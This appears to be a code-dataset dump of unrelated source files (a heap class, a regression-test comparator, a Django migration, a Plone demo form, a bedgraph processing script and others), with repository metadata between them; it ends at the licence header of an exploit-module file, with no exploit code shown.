        heapq.heapify(self)

    def pushpop(self, item):
        "Push the item onto the heap and then pop the smallest value"
        # heapreplace pops first then pushes; guarding on self[0] < item
        # makes the combined operation behave as push-then-pop.
        if self and self[0] < item:
            return heapq.heapreplace(self, item)
        return item

    def __iter__(self):
        "Return a destructive iterator over the heap's elements"
        try:
            while True:
                yield self.popmin()
        except IndexError:
            pass

    def reduce(self, pos, newitem):
        "Replace self[pos] with a lower value item and then reheapify"
        # Sift the new, smaller item up towards the root.
        while pos > 0:
            parentpos = (pos - 1) >> 1
            parent = self[parentpos]
            if parent <= newitem:
                break
            self[pos] = parent
            pos = parentpos
        self[pos] = newitem

    def is_heap(self):
        "Return True if the heap has the heap property; False otherwise"
        n = len(self)
        # Only indices with at least one child (i < n//2) need checking;
        # the second-child probe may run one past the end, hence the
        # IndexError guard. (range replaces the Python-2-only xrange.)
        try:
            for i in range(n // 2):
                if self[i] > self[2 * i + 1]:
                    return False
                if self[i] > self[2 * i + 2]:
                    return False
        except IndexError:
            pass
        return True
def heapsort(seq):
    """Return a sorted list of *seq* by draining a Heap built from it."""
    ordered = []
    for smallest in Heap(seq):
        ordered.append(smallest)
    return ordered
# Self-test harness (Python 2 syntax: print statements, xrange).
if __name__ == '__main__':
    from random import randint, shuffle
    # generate a random test case
    n = 15
    data = [randint(1,n) for i in xrange(n)]
    shuffle(data)
    print data
    # test the constructor
    heap = Heap(data)
    print heap, heap.is_heap()
    # test popmin: draining the heap must yield the data in sorted order
    sorted = []
    while heap:
        sorted.append(heap.popmin())
    data.sort()
    print heap, heap.is_heap()
    print data == sorted
    # test 2
    shuffle(data)
    print data
    # test push
    for item in data:
        heap.push(item)
    print heap, heap.is_heap()
    # test __iter__ (destructive: consumes the heap in sorted order)
    sorted = [x for x in heap]
    data.sort()
    print data == sorted
    # test 3
    shuffle(data)
    print data
    heap = Heap(data)
    print heap, heap.is_heap()
    # test reduce: lower random positions and re-check the invariant
    for i in range(5):
        pos = randint(0,n-1)
        decr = randint(1,10)
        item = heap[pos] - decr
        heap.reduce(pos, item)
    # test is_heap: shuffle until a permutation happens to be a heap
    heap = Heap(data)
    count = 0
    while 1:
        shuffle(heap)
        if heap.is_heap():
            print heap
            break
        else:
            count += 1
    print 'It took', count, 'tries to find a heap by chance.'
    print heapsort(data)
    # __slots__ = () means instances accept no new attributes
    try:
        heap.x = 5
    except AttributeError:
        print "Can't add attributes."
|
[
"betty@qburst.com"
] |
betty@qburst.com
|
07429b6879f054b600fb5a4eef6ac5a978e6a3c6
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/Tools/RunTimeTester/share/RTTRegression.py
|
19c13f5f565c3c5ef12dd5971cc99fc2fc4f666e
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949
| 2020-01-19T03:59:35
| 2020-01-19T03:59:35
| 234,836,993
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,958
|
py
|
######################################################
#                                                    #
#  Do NOT bind any objects (self.xxx) which contain  #
#  file objects (such as self.logger in this class), #
#  otherwise the objects cannot be shelved.          #
#  Instead, unload the necessary variables in        #
#  __init__.                                         #
#                                                    #
######################################################
import os.path, anydbm
class RTTRegression:
    """An RTT test that compares a new results database against a reference.

    run() diffs two anydbm databases key by key and writes a human-readable
    report to <fixture>_regression.log, returning self.success (0) when
    they match and self.error (-1) otherwise.

    Do NOT bind file objects to self: instances are shelved, and open
    files cannot be pickled.
    """
    def __init__(self, argDict):
        self.success = 0
        self.error = -1
        # self.logger = argDict['logger']
        # NOTE(review): Logger is not imported in this module's visible
        # imports -- confirm it is provided elsewhere (e.g. injected).
        self.logger = Logger()
        msg = 'Instantiating RTTRegression, args: %s' % str(argDict)
        self.logger.debug(msg)
        # fixtureDir is set in JobsXMLReader when reading in the config file.
        self.fixtureDir = argDict['fixtureDir']
        # the current directory
        jDescriptor = argDict['JobDescriptor']
        self.runPath = jDescriptor.runPath
        # directory of the source code under test
        self.rttSrcDir = os.path.join(self.runPath, 'Tools/RunTimeTester/src')
        self.runPath = jDescriptor.runPath
        fixture = os.path.basename(self.fixtureDir)
        self.dbName = os.path.join(self.runPath, fixture + '.db')
        self.refdbName = os.path.join(self.runPath, 'refFile_' + fixture + '.db')
        # Do not open the log file here: the directory may not exist yet.
        self.ofName = os.path.join(self.runPath, fixture + '_regression.log')

    def run(self):
        """Diff new vs. reference database and write the report file."""
        outFile = open(self.ofName, 'w')
        # Bail out early (logging the problem) when either database is absent.
        if not os.path.exists(self.dbName):
            msg = 'None existant path: %s' % self.dbName
            self.logger.error(msg)
            outFile.write(msg + '\n')
            outFile.close()
            return self.error
        if not os.path.exists(self.refdbName):
            msg = 'None existant path: %s' % self.refdbName
            self.logger.error(msg)
            outFile.write(msg + '\n')
            outFile.close()
            return self.error
        newDB = anydbm.open(self.dbName, 'r')
        oldDB = anydbm.open(self.refdbName, 'r')
        result = self.success
        onlyInNew = [k for k in newDB.keys() if k not in oldDB.keys()]
        text = 'Number of keys in reference db %d\n' % len(oldDB.keys())
        # Bug fix: this line used "text =", silently discarding the
        # reference-db count above; it must append.
        text += 'Number of keys in new db %d\n' % len(newDB.keys())
        if onlyInNew:
            result = self.error
            text += '\n'
            text += 'Reference - %s: date: %s\n' % (oldDB['fixtureDir'],
                                                    oldDB['date'])
            text += 'New - %s: date: %s\n' % (newDB['fixtureDir'],
                                              newDB['date'])
            text += '\n'
            text += ' keys in new database, but not in old\n'
            text += str(onlyInNew) + '\n'
            text += '\n'
        onlyInOld = [k for k in oldDB.keys() if k not in newDB.keys()]
        if onlyInOld:
            result = self.error
            text += '\n'
            text += ' keys in old database, but not in new\n'
            text += str(onlyInOld) + '\n'
            text += '\n'
        # Compare values for the keys common to both databases; the
        # metadata keys are expected to differ, so drop them first.
        keys = [k for k in oldDB.keys() if k in newDB.keys()]
        toRemove = ['fixtureDir', 'date']
        [keys.remove(k) for k in toRemove if k in keys]
        if keys:
            text += 'differences:\n'
            text += '\n'
        for k in keys:
            if oldDB[k] != newDB[k]:
                result = self.error
                text += 'Key: %s\n' % k
                text += '\n'
                text += ' old:\n'
                text += ' ' + str(oldDB[k]) + '\n'
                text += '\n'
                text += ' new:\n'
                text += ' ' + str(newDB[k]) + '\n'
                text += '\n'
        # Tally the number of comma-separated test points per key.
        totTests = 0
        text += 'Number of points examined:\n'
        for k in keys:
            line = ''
            line += k.ljust(30)
            ntestOld = len(oldDB[k].split(','))
            ntestNew = len(newDB[k].split(','))
            # assert(ntestOld == ntestNew)
            num = '%d' % ntestOld
            line += num.ljust(5)
            # print line
            totTests += ntestOld
        text += 'No of test classes which pass: %d\n' % len(keys)
        text += 'Total number of tests passed: %d\n ' % totTests
        outFile.write(text)
        outFile.close()
        return result
|
[
"rushioda@lxplus754.cern.ch"
] |
rushioda@lxplus754.cern.ch
|
170b5974377c2010e0e6ae80d052cc8a08dec18a
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/bob/4dab219f99ff457d92c76f4fa70ad98f.py
|
52042ea3de170bc5f8eedc4c2b7c186736a74912
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 308
|
py
|
#
# Skeleton file for the Python "Bob" exercise.
#
def hey(what):
    """Bob's lackadaisical replies: shouted text, questions, silence,
    and everything else each get a fixed response."""
    shouting = what == what.upper() and what != what.lower()
    if shouting:
        return 'Whoa, chill out!'
    if what.endswith('?'):
        return 'Sure.'
    if not what.strip():
        return 'Fine. Be that way!'
    return 'Whatever.'
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
45db6168ca6a0ad2f3120d8dba3898a85cf52fd8
|
8f1dbd7c032a57c74a36f07690b2ecc80fb3e665
|
/scratch/follow-ball.piborg.py
|
09741060a051a0ba26472b3e1a30bbafa4e92cae
|
[
"MIT"
] |
permissive
|
westpark/piwars-2018
|
6b861ff46366a76cbf8bfbec11d255e31d471b3a
|
a2e1cb67e5fcc8f65ed17975d076088a9f92da2a
|
refs/heads/master
| 2021-04-28T10:57:42.294132
| 2018-04-19T10:35:24
| 2018-04-19T10:35:24
| 122,079,822
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,143
|
py
|
#!/usr/bin/env python
# coding: utf-8
# Load library functions we want
import time
import os
import sys
import ThunderBorg
import io
import threading
import picamera
import picamera.array
import cv2
import numpy
# Python 2 script: board discovery, power limits and tuning constants.
print 'Libraries loaded'
# Global values
# NOTE: "global" at module level is a no-op; kept from the original.
global running
global TB
global camera
global processor
running = True
# Setup the ThunderBorg motor controller over I2C.
TB = ThunderBorg.ThunderBorg()
#TB.i2cAddress = 0x15 # Uncomment and change the value if you have changed the board address
TB.Init()
# Abort with a diagnostic listing when no board answers at the address.
if not TB.foundChip:
    boards = ThunderBorg.ScanForThunderBorg()
    if len(boards) == 0:
        print 'No ThunderBorg found, check you are attached :)'
    else:
        print 'No ThunderBorg at address %02X, but we did find boards:' % (TB.i2cAddress)
        for board in boards:
            print ' %02X (%d)' % (board, board)
        print 'If you need to change the I²C address change the setup line so it is correct, e.g.'
        print 'TB.i2cAddress = 0x%02X' % (boards[0])
    sys.exit()
TB.SetCommsFailsafe(False)
# Power settings
voltageIn = 12.0 # Total battery voltage to the ThunderBorg
voltageOut = 12.0 * 0.95 # Maximum motor voltage, we limit it to 95% to allow the RPi to get uninterrupted power
# Camera settings
imageWidth = 320 # Camera image width
imageHeight = 240 # Camera image height
frameRate = 3 # Camera image capture frame rate
# Auto drive settings
autoMaxPower = 1.0 # Maximum output in automatic mode
autoMinPower = 0.2 # Minimum output in automatic mode
autoMinArea = 10 # Smallest target to move towards
autoMaxArea = 10000 # Largest target to move towards
autoFullSpeedArea = 300 # Target size at which we use the maximum allowed output
# Setup the power limits: scale motor output so it never exceeds voltageOut.
if voltageOut > voltageIn:
    maxPower = 1.0
else:
    maxPower = voltageOut / float(voltageIn)
autoMaxPower *= maxPower
# Image stream processing thread
class StreamProcessor(threading.Thread):
    """Worker thread: waits for camera frames, finds the ball, sets motors."""
    def __init__(self):
        super(StreamProcessor, self).__init__()
        self.stream = picamera.array.PiRGBArray(camera)
        self.event = threading.Event()
        self.terminated = False
        # Daemonless auto-start: the thread begins running immediately.
        self.start()
        self.begin = 0
    def run(self):
        # This method runs in a separate thread
        while not self.terminated:
            # Wait for an image to be written to the stream
            if self.event.wait(1):
                try:
                    # Read the image and do some processing on it
                    self.stream.seek(0)
                    self.ProcessImage(self.stream.array)
                finally:
                    # Reset the stream and event
                    self.stream.seek(0)
                    self.stream.truncate()
                    self.event.clear()
    # Image processing function
    def ProcessImage(self, image):
        # Get the red section of the image
        image = cv2.medianBlur(image, 5)
        image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV) # Swaps the red and blue channels!
        # Threshold on a narrow hue band (115-125) with minimum saturation/value.
        red = cv2.inRange(image, numpy.array((115, 127, 64)), numpy.array((125, 255, 255)))
        # Find the contours
        contours,hierarchy = cv2.findContours(red, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
        # Go through each contour, keeping the largest bounding box as the ball.
        foundArea = -1
        foundX = -1
        foundY = -1
        for contour in contours:
            x,y,w,h = cv2.boundingRect(contour)
            cx = x + (w / 2)
            cy = y + (h / 2)
            area = w * h
            if foundArea < area:
                foundArea = area
                foundX = cx
                foundY = cy
        if foundArea > 0:
            ball = [foundX, foundY, foundArea]
        else:
            ball = None
        # Set drives or report ball status
        self.SetSpeedFromBall(ball)
    # Set the motor speed from the ball position
    def SetSpeedFromBall(self, ball):
        global TB
        driveLeft = 0.0
        driveRight = 0.0
        if ball:
            x = ball[0]
            area = ball[2]
            if area < autoMinArea:
                print 'Too small / far'
            elif area > autoMaxArea:
                print 'Close enough'
            else:
                if area < autoFullSpeedArea:
                    speed = 1.0
                else:
                    # NOTE(review): Python 2 integer division here — both
                    # operands are ints, so the ratio truncates; confirm
                    # this is the intended speed falloff.
                    speed = 1.0 / (area / autoFullSpeedArea)
                speed *= autoMaxPower - autoMinPower
                speed += autoMinPower
                # direction in [-1, 1]: negative when the ball is left of centre.
                direction = (x - imageCentreX) / imageCentreX
                if direction < 0.0:
                    # Turn right
                    driveLeft = speed
                    driveRight = speed * (1.0 + direction)
                else:
                    # Turn left
                    driveLeft = speed * (1.0 - direction)
                    driveRight = speed
            print '%.2f, %.2f' % (driveLeft, driveRight)
        else:
            print 'No ball'
        TB.SetMotor1(driveLeft)
        TB.SetMotor2(driveRight)
# Image capture thread
class ImageCapture(threading.Thread):
    """Thread feeding camera frames to the StreamProcessor via capture_sequence."""
    def __init__(self):
        super(ImageCapture, self).__init__()
        # Auto-start on construction, mirroring StreamProcessor.
        self.start()
    def run(self):
        global camera
        global processor
        print 'Start the stream using the video port'
        # Blocks until TriggerStream's generator is exhausted (running=False).
        camera.capture_sequence(self.TriggerStream(), format='bgr', use_video_port=True)
        print 'Terminating camera processing...'
        processor.terminated = True
        processor.join()
        print 'Processing terminated.'
    # Stream delegation loop
    def TriggerStream(self):
        global running
        while running:
            # Only hand the shared stream out when the processor is idle;
            # the event flags a frame as ready for processing.
            if processor.event.is_set():
                time.sleep(0.01)
            else:
                yield processor.stream
                processor.event.set()
# Startup sequence
print 'Setup camera'
camera = picamera.PiCamera()
camera.resolution = (imageWidth, imageHeight)
camera.framerate = frameRate
imageCentreX = imageWidth / 2.0
imageCentreY = imageHeight / 2.0
print 'Setup the stream processing thread'
processor = StreamProcessor()
print 'Wait ...'
# Give the camera time to settle before starting capture.
time.sleep(2)
captureThread = ImageCapture()
try:
    print 'Press CTRL+C to quit'
    TB.MotorsOff()
    TB.SetLedShowBattery(True)
    # Loop indefinitely until we are no longer running
    while running:
        # Wait for the interval period
        # You could have the code do other work in here :)
        time.sleep(1.0)
    # Disable all drives
    TB.MotorsOff()
except KeyboardInterrupt:
    # CTRL+C exit, disable all drives
    print '\nUser shutdown'
    TB.MotorsOff()
except:
    # Unexpected error, shut down!
    # NOTE(review): bare except is deliberate here — any failure must
    # still stop the motors before the process dies.
    e = sys.exc_info()[0]
    print
    print e
    print '\nUnexpected error, shutting down!'
    TB.MotorsOff()
# Tell each thread to stop, and wait for them to end
running = False
captureThread.join()
processor.terminated = True
processor.join()
del camera
TB.MotorsOff()
TB.SetLedShowBattery(False)
TB.SetLeds(0,0,0)
print 'Program terminated.'
|
[
"mail@timgolden.me.uk"
] |
mail@timgolden.me.uk
|
c6c9f8053ce7426d8e40844b29b1a9736d500e03
|
777a972966fa29a1b5a1a0c5d507a3137de007fc
|
/stock_pick_batch/__manifest__.py
|
cfbf3abdc520bc1242de59ad4d6ad1cd7d0cc3c3
|
[] |
no_license
|
suningwz/ruvati
|
1d1ace30fb2929f686f368fb8d8c51ae76a71190
|
9b15373125139cab1d26294c218685c5b87b9709
|
refs/heads/master
| 2023-08-15T22:28:18.499733
| 2021-10-12T12:16:56
| 2021-10-12T12:16:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 753
|
py
|
# -*- coding: utf-8 -*-
{
"name": "Stock Picking Batch",
"version": "1.1",
"category": 'Inventory',
'complexity': "normal",
'author': 'Confianz Global,Inc.',
'description': """
Batch transfer in inventory
""",
'website': 'http://www.confianzit.com',
"depends": ['base', 'delivery_extension', 'stock_picking_batch','stock','delivery'],
'data': [
'views/stock_view.xml',
'report/batch_picking_report.xml',
'report/batch_picking_report_views.xml',
'static/src/xml/batch_transfer_ruvati.xml'
],
'demo_xml': [],
'installable': True,
'application': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"vinod@confianzit.biz"
] |
vinod@confianzit.biz
|
f58261daab0df0e28c03fbe345a6d2e337fdc477
|
45b159e64114d8759c0e2987bd0a6f02f60daf4d
|
/Python/APL/ch14/distanceThreeArrays.py
|
80483127107e3734d02efe667945abcd5ac19af1
|
[] |
no_license
|
afcarl/Coding_Interview_Problems
|
45b24b849a90581db5327811c5ab78237f4d5ac0
|
1256d4394d506aec875e9e19300404a9b32a4eb1
|
refs/heads/master
| 2020-03-16T20:16:54.706152
| 2015-02-11T05:51:56
| 2015-02-11T05:51:56
| 132,953,286
| 1
| 0
| null | 2018-05-10T20:54:14
| 2018-05-10T20:54:14
| null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
'''
Created on Jan 24, 2015
@author: Ben Athiwaratkun (pa338)
'''
#from __future__ import division
#import numpy as np
def findMin(A,B,C):
    # NOTE(review): unimplemented stub — the name and the three-array
    # signature suggest a minimisation over A, B and C, but no
    # specification is visible in this file; it currently returns None.
    pass
def main():
    # Sample inputs exercising the findMin stub; the result is discarded.
    A = [1,2,3]
    B = [4,1,8]
    C = [3,2,7]
    findMin(A,B,C)
if __name__ == "__main__":
    main()
|
[
"ben.athiwaratkun@gmail.com"
] |
ben.athiwaratkun@gmail.com
|
11689979f2e6aaa273058e3b89ba57a7a4d578c0
|
1fa265a01400c23f9ca494a1d9ef55b6cef85cdc
|
/inventory/migrations/0102_auto_20200131_1454.py
|
ac78634fc95dc9da549ec9a25ce03a0aaf6d0ca9
|
[] |
no_license
|
dipesh779/posbackend
|
523660b40be4d5deaff6b6c267c65fa9caba00de
|
06effb004448dbb6d99077790ceb4738875e6505
|
refs/heads/master
| 2022-04-25T09:15:12.081266
| 2020-05-04T04:45:56
| 2020-05-04T04:45:56
| 261,082,375
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,522
|
py
|
# Generated by Django 2.2.7 on 2020-01-31 09:09
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: widen ten StockComputation quantity/price fields to
    nullable DecimalField(max_digits=10, decimal_places=2, default=0.0)."""
    dependencies = [
        ('inventory', '0101_auto_20200131_0911'),
    ]
    operations = [
        migrations.AlterField(
            model_name='stockcomputation',
            name='complimentory_sale',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='discrepancy_stock',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='expired_quantity',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='final_closing_stock',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='inspected_stock',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='received_stock',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='sale',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='theoritical_QOH',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='threshold_quantity',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
        migrations.AlterField(
            model_name='stockcomputation',
            name='weigh_price',
            field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
        ),
    ]
|
[
"dipesh@perplexsolutions.com"
] |
dipesh@perplexsolutions.com
|
836dc051ae842d3fb098afe67dd219518fdf722b
|
2aa47f47fb81798afdf41437844cbbea8e9de66c
|
/02pythonBase/day12/day11_exercise/factorial_sum.py
|
d9c669a1112be4d4c20c74aede6742f36eab15e2
|
[] |
no_license
|
nykh2010/python_note
|
83f2eb8979f2fb25b4845faa313dbd6b90b36f40
|
5e7877c9f7bf29969072f05b98277ef3ba090969
|
refs/heads/master
| 2020-04-27T23:10:16.578094
| 2019-03-23T02:43:14
| 2019-03-23T02:43:14
| 174,765,151
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 299
|
py
|
# 3. Write a program that computes the sum of the factorials of 1 ~ 20:
# 1! + 2! + 3! + 4! + ..... + 20!
# Method 1: explicit recursion and an accumulator loop (kept for reference)
# def myfac(n):
#     if n == 1:
#         return 1
#     return n * myfac(n - 1)
# s = 0
# for x in range(1, 21):
#     s += myfac(x)
# print(s)
# Method 2: one-liner using the standard library's factorial.
import math
print(sum(map(math.factorial, range(1, 21))))
|
[
"xulingfeng@boe.com.cn"
] |
xulingfeng@boe.com.cn
|
ef7cfcbb15eaf35f6cd7f8058281eb80959721bb
|
40fc1d38f2d4b643bc99df347c4ff3a763ba65e3
|
/arcade/infiniworld/src/infiniworld/__init__.py
|
77165064cf85d6cbd506c2db160a29d5cf41a5cf
|
[] |
no_license
|
alecordev/pygaming
|
0be4b7a1c9e7922c63ce4cc369cd893bfef7b03c
|
35e479b703acf038f47c2151b3759ad852781e4c
|
refs/heads/master
| 2023-05-14T05:03:28.484678
| 2021-06-03T10:11:08
| 2021-06-03T10:11:08
| 372,768,733
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 317
|
py
|
"""The infiniworld package contains the entire game engine: Models Views and
Controllers, but also physics, geometry, time management, etc.
"""
from . import controllers
from . import events
from . import evtman
from . import geometry
from . import log
from . import models
from . import physics
from . import time_
|
[
"alecor.dev@gmail.com"
] |
alecor.dev@gmail.com
|
b81680590f118a2d347e1fb05c0986f14e401d1d
|
5d0edf31b17c5375faf6126c1a7be8e79bfe2ab8
|
/buildout-cache/eggs/plone.formwidget.contenttree-1.0.14-py2.7.egg/plone/formwidget/contenttree/demo.py
|
57b8a81802b37b1a271061de3b3b447da24627fd
|
[] |
no_license
|
renansfs/Plone_SP
|
27cba32ebd9fc03dae3941ec23cf1bf0a7b6667a
|
8a7bdbdb98c3f9fc1073c6061cd2d3a0ec80caf5
|
refs/heads/master
| 2021-01-15T15:32:43.138965
| 2016-08-24T15:30:19
| 2016-08-24T15:30:19
| 65,313,812
| 0
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,759
|
py
|
from zope.component import adapts
from zope.interface import Interface, implements
from zope import schema
from plone.z3cform import layout
from z3c.form import form, button, field
from plone.formwidget.contenttree import ContentTreeFieldWidget
from plone.formwidget.contenttree import MultiContentTreeFieldWidget
from plone.formwidget.contenttree import PathSourceBinder
class ITestForm(Interface):
    # Demo schema exercising both contenttree widgets: a single-select
    # Choice and a multi-select List, each restricted to Document
    # objects via a path source.
    buddy = schema.Choice(title=u"Buddy object",
                          description=u"Select one, please",
                          source=PathSourceBinder(portal_type='Document'))
    friends = schema.List(
        title=u"Friend objects",
        description=u"Select as many as you want",
        value_type=schema.Choice(
            title=u"Selection",
            source=PathSourceBinder(portal_type='Document')))
class TestAdapter(object):
    """Stub storage adapter for ITestForm usable on any context.

    Reads always return empty values; writes only echo to stdout so a
    widget round-trip can be observed interactively.  (Python 2 code.)
    """
    implements(ITestForm)
    adapts(Interface)
    def __init__(self, context):
        self.context = context
    def _get_buddy(self):
        return None
    def _set_buddy(self, value):
        print "setting", value
    buddy = property(_get_buddy, _set_buddy)
    def _get_friends(self):
        return []
    def _set_friends(self, value):
        print "setting", value
    friends = property(_get_friends, _set_friends)
class TestForm(form.Form):
    """z3c.form demo form wiring the contenttree widgets to ITestForm."""
    fields = field.Fields(ITestForm)
    fields['buddy'].widgetFactory = ContentTreeFieldWidget
    fields['friends'].widgetFactory = MultiContentTreeFieldWidget
    # To check display mode still works, uncomment this and hit refresh.
    #mode = 'display'
    @button.buttonAndHandler(u'Ok')
    def handle_ok(self, action):
        # Echo the extracted values/errors for manual inspection.
        data, errors = self.extractData()
        print data, errors
# Wrap the demo form in a Plone layout view so it can be registered.
TestView = layout.wrap_form(TestForm)
|
[
"renansfs@gmail.com"
] |
renansfs@gmail.com
|
2d3850df0c094eeb7f706d70aa509e5e2011f721
|
772b0df2635b95644ea3eb370103174804024167
|
/scripts/process_file.py
|
cfce2bb5b07aee825c3a76f0632392eb3a6e3579
|
[
"MIT"
] |
permissive
|
4dn-dcic/clodius
|
ec909bda90a9df13fa1b85472951f6cf149213a5
|
aa31b3d90a5a9fec883c20cab31ad4d347cd52cd
|
refs/heads/develop
| 2020-04-17T23:31:32.114043
| 2019-04-02T14:01:46
| 2019-04-02T14:01:46
| 167,038,915
| 0
| 0
|
MIT
| 2019-03-28T20:10:46
| 2019-01-22T17:43:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,597
|
py
|
from __future__ import print_function
import argparse
import os.path as op
import subprocess as sp
import sys
import tempfile as tf
def main():
    """Convert a bedgraph/bigwig file to a sorted, gzipped genome file.

    Builds a subprocess pipeline: (optionally bigWigToBedGraph) -> pv
    (progress meter) -> awk (reshape columns) ->
    chr_pos_to_genome_pos.py -> sort -> gzip, writing the result to
    <input>.genome.sorted.gz next to the input file.  Requires the
    external tools pv, awk, sort, gzip (and bigWigToBedGraph for
    bigwig input) on PATH.
    """
    usage = """
    python make_tiles.py input_file
    Create tiles for all of the entries in the JSON file.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('filepath')
    parser.add_argument('-a', '--assembly', default='hg19')
    parser.add_argument('-t', '--type', default='bedgraph')
    parser.add_argument('--stdout', default=False, action='store_true',
                        help="Dump output to stdout (not implemented yet)")
    args = parser.parse_args()
    filedir = op.dirname(args.filepath)
    # NOTE(review): opened in text mode, but only child processes write
    # to it (via its fd), and it is never explicitly closed — relies on
    # interpreter exit to flush/close.
    outfile = open(args.filepath + '.genome.sorted.gz', 'w')
    tempfile = tf.TemporaryFile('w+b')
    if args.type == 'bigwig':
        # Convert bigwig to bedgraph first, buffering in a temp file.
        tempfile1 = tf.TemporaryFile()
        p05 = sp.Popen(['bigWigToBedGraph', args.filepath, '/dev/fd/1'],
                stdout = tempfile1)
        p05.wait()
        tempfile1.seek(0)
        p0 = sp.Popen(['pv', '-f', '-'],
                stdin=tempfile1,
                stdout=sp.PIPE,
                stderr=sp.PIPE,
                universal_newlines=True)
        pn = p0
    elif args.type == 'bedgraph':
        p0 = sp.Popen(['pv', '-f', args.filepath],
                  stdout=sp.PIPE,
                  stderr=sp.PIPE,
                  universal_newlines=True)
        pn = p0
    # awk duplicates the chromosome column: chrom start chrom end value.
    p1 = sp.Popen(["awk", "{print $1, $2, $1, $3, $4 }"],
            stdin = pn.stdout,
            stdout=sp.PIPE)
    p2 = sp.Popen(['chr_pos_to_genome_pos.py', '-e 5', '-a', '{}'.format(args.assembly)],
            stdin = p1.stdout,
            stdout=sp.PIPE)
    # Numeric sort on the genome coordinates, into the temp file.
    p3 = sp.Popen(['sort', '-k1,1n', '-k2,2n', '-'],
            stdin = p2.stdout,
            stdout=tempfile)
    # Relay pv's progress output (written to stderr) to our stdout.
    for line in iter(p0.stderr.readline, ""):
        print("line:", line.strip())
    p0.wait()
    p1.wait()
    p2.wait()
    p3.wait()
    tempfile.flush()
    print("tell:", tempfile.tell())
    tempfile.seek(0)
    # Second pv pass to show progress while compressing.
    p35 = sp.Popen(['pv', '-f', '-'],
            stdin = tempfile,
            stdout = sp.PIPE,
            stderr = sp.PIPE,
            universal_newlines=True)
    p4 = sp.Popen(['gzip'],
            stdin = p35.stdout, stdout=outfile)
    for line in iter(p35.stderr.readline, ""):
        print("line:", line.strip())
    p35.wait()
    p4.wait()
    print("filedir:", filedir)
if __name__ == '__main__':
    main()
|
[
"pkerpedjiev@gmail.com"
] |
pkerpedjiev@gmail.com
|
512c1fce60003522e98e0f5f3d8278c65001a88e
|
437428a48278b4e9bc04e1b8acbb33199f409376
|
/modules/exploit/unix/dvr/camera_credentials_disclosure.py
|
563adb10d9ee37945d96f06681ce86ece688b976
|
[
"MIT"
] |
permissive
|
happylaodu/HatSploit
|
06d18ba2590456241ba61273d9f3d662a8bb26ec
|
9d53f3db85ce38483c6e7d16570ac233c5dd93cf
|
refs/heads/main
| 2023-04-30T20:18:37.090185
| 2021-06-02T20:23:08
| 2021-06-02T20:23:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,120
|
py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
